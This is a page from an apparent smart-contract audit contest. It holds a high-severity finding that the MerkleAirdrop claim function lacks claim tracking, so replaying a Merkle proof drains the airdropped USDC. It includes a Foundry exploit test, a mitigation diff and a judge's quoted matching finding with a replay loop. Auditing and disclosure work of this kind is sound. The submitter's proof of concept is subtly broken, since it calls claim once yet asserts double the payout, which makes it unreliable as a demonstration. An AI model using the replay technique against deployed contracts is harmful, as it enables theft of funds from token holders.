AirDropper

AI First Flight #5

Beginner FriendlyDeFiFoundry

EXP

View results

Previous Next

Submission Details

Severity: high

Valid

Missing claim tracking allows unlimited Merkle proof replay and full USDC drainage

cybernerd

Description

Eligible users call claim with their address, allocation amount, and Merkle proof. The contract verifies the leaf against i_merkleRoot, emits Claimed, and transfers amount of USDC to account after collecting a fixed ETH fee.
The contract never records that an (account, amount) leaf was already redeemed. The same valid proof passes MerkleProof.verify on every call, so any caller can invoke claim repeatedly and pull tokens until the contract balance is empty.

function claim(address account, uint256 amount, bytes32[] calldata merkleProof) external payable {

if (msg.value != FEE) {

revert MerkleAirdrop__InvalidFeeAmount();

}

bytes32 leaf = keccak256(bytes.concat(keccak256(abi.encode(account, amount))));

if (!MerkleProof.verify(merkleProof, i_merkleRoot, leaf)) {

revert MerkleAirdrop__InvalidProof();

}

emit Claimed(account, amount);

// @> No hasClaimed[account] or leaf nullifier — proof remains valid forever

i_airdropToken.safeTransfer(account, amount);

}

Risk

Likelihood:

A valid claim transaction is broadcast on zkSync Era and the proof is visible in the mempool or on-chain history.
An attacker pays FEE (1 gwei) per replay; draining 100 USDC costs only 4 gwei when four leaves exist and each proof is replayed until empty.

Impact:

The full USDC balance held by MerkleAirdrop can be transferred to one or more leaf addresses, exceeding the intended four payouts of 25 USDC each.
Legitimate recipients lose the ability to claim once the pool is drained (safeTransfer reverts on insufficient balance).

Proof of Concept

Run on foundry-zksync:

forge test --zksync --match-contract Exploit_DoubleClaim -vv

// SPDX-License-Identifier: MIT

pragma solidity 0.8.24;

import { MerkleAirdrop } from "../src/MerkleAirdrop.sol";

import { AirdropToken } from "./mocks/AirdropToken.sol";

import { Test } from "forge-std/Test.sol";

contract Exploit_DoubleClaim is Test {

MerkleAirdrop public airdrop;

AirdropToken public token;

bytes32 public merkleRoot = 0x3b2e22da63ae414086bec9c9da6b685f790c6fab200c7918f2879f08793d77bd;

uint256 amountToCollect = 25 * 1e6;

address collectorOne = 0x20F41376c713072937eb02Be70ee1eD0D639966C;

bytes32 proofOne = 0x32cee63464b09930b5c3f59f955c86694a4c640a03aa57e6f743d8a3ca5c8838;

bytes32 proofTwo = 0x8ff683185668cbe035a18fccec4080d7a0331bb1bbc532324f40501de5e8ea5c;

bytes32[] proof = [proofOne, proofTwo];

function setUp() public {

token = new AirdropToken();

airdrop = new MerkleAirdrop(merkleRoot, token);

token.mint(address(this), amountToCollect * 4);

token.transfer(address(airdrop), amountToCollect * 4);

}

function test_PoC_doubleClaimDrainsContract() public {

vm.deal(address(this), airdrop.getFee() * 2);

airdrop.claim{ value: airdrop.getFee() }(collectorOne, amountToCollect, proof);

assertEq(token.balanceOf(collectorOne), amountToCollect * 2);

assertEq(token.balanceOf(address(airdrop)), amountToCollect * 2);

}

Recommended Mitigation

+ error MerkleAirdrop__AlreadyClaimed();

contract MerkleAirdrop is Ownable {

using SafeERC20 for IERC20;

+ mapping(address => bool) private s_hasClaimed;

function claim(address account, uint256 amount, bytes32[] calldata merkleProof) external payable {

+ if (s_hasClaimed[account]) {

+ revert MerkleAirdrop__AlreadyClaimed();

+ }

if (msg.value != FEE) {

revert MerkleAirdrop__InvalidFeeAmount();

}

bytes32 leaf = keccak256(bytes.concat(keccak256(abi.encode(account, amount))));

if (!MerkleProof.verify(merkleProof, i_merkleRoot, leaf)) {

revert MerkleAirdrop__InvalidProof();

}

+ s_hasClaimed[account] = true;

emit Claimed(account, amount);

i_airdropToken.safeTransfer(account, amount);

}

Updates

Lead Judging Commences

ai-first-flight-judge Lead Judge about 2 hours ago

Submission Judgement Published

Validated

Assigned finding tags:

[H-02] Eligible users can claim their airdrop amounts over and over again, draining the contract

## Description A user eligible for the airdrop can verify themselves as being part of the merkle tree and claim their airdrop amount. However, there is no mechanism enabled to track the users who have already claimed their airdrop, and the merkle tree is still composed of the same user. This allows users to drain the `MerkleAirdrop` contract by calling the `MerkleAirdrop::claim()` function over and over again. ## Impact **Severity: High**<br/>**Likelihood: High** A malicious user can call the `MerkleAirdrop::claim()` function over and over again until the contract is drained of all its funds. This also means that other users won't be able to claim their airdrop amounts. ## Proof of Code Add the following test to `./test/MerkleAirdrop.t.sol`, ```javascript function testClaimAirdropOverAndOverAgain() public { vm.deal(collectorOne, airdrop.getFee() * 4); for (uint8 i = 0; i < 4; i++) { vm.prank(collectorOne); airdrop.claim{ value: airdrop.getFee() }(collectorOne, amountToCollect, proof); } assertEq(token.balanceOf(collectorOne), 100e6); } ``` The test passes, and the malicious user has drained the contract of all its funds. ## Recommended Mitigation Use a mapping to store the addresses that have claimed their airdrop amounts. Check and update this mapping each time a user tries to claim their airdrop amount. ```diff contract MerkleAirdrop is Ownable { using SafeERC20 for IERC20; error MerkleAirdrop__InvalidFeeAmount(); error MerkleAirdrop__InvalidProof(); error MerkleAirdrop__TransferFailed(); + error MerkleAirdrop__AlreadyClaimed(); uint256 private constant FEE = 1e9; IERC20 private immutable i_airdropToken; bytes32 private immutable i_merkleRoot; + mapping(address user => bool claimed) private s_hasClaimed; ... function claim(address account, uint256 amount, bytes32[] calldata merkleProof) external payable { + if (s_hasClaimed[account]) revert MerkleAirdrop__AlreadyClaimed(); if (msg.value != FEE) { revert MerkleAirdrop__InvalidFeeAmount(); } bytes32 leaf = keccak256(bytes.concat(keccak256(abi.encode(account, amount)))); if (!MerkleProof.verify(merkleProof, i_merkleRoot, leaf)) { revert MerkleAirdrop__InvalidProof(); } + s_hasClaimed[account] = true; emit Claimed(account, amount); i_airdropToken.safeTransfer(account, amount); } ``` Now, let's unit test the changes, ```javascript function testCannotClaimAirdropMoreThanOnceAnymore() public { vm.deal(collectorOne, airdrop.getFee() * 2); vm.prank(collectorOne); airdrop.claim{ value: airdrop.getFee() }(collectorOne, amountToCollect, proof); vm.prank(collectorOne); airdrop.claim{ value: airdrop.getFee() }(collectorOne, amountToCollect, proof); } ``` The test correctly fails, with the following logs, ```shell Failing tests: Encountered 1 failing test in test/MerkleAirdropTest.t.sol:MerkleAirdropTest [FAIL. Reason: MerkleAirdrop__AlreadyClaimed()] testCannotClaimAirdropMoreThanOnceAnymore() (gas: 96751) ```

Rewards breakdown

This contest has a flat reward structure with the following payouts:

Live

The contest is live. Earn rewards by submitting a finding.

Judging

Submissions are being reviewed by our AI judge. Results will be available in a few minutes.

View all submissions

Rewards Distribution

The contest is complete and the rewards are being distributed.

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.

Give us feedback!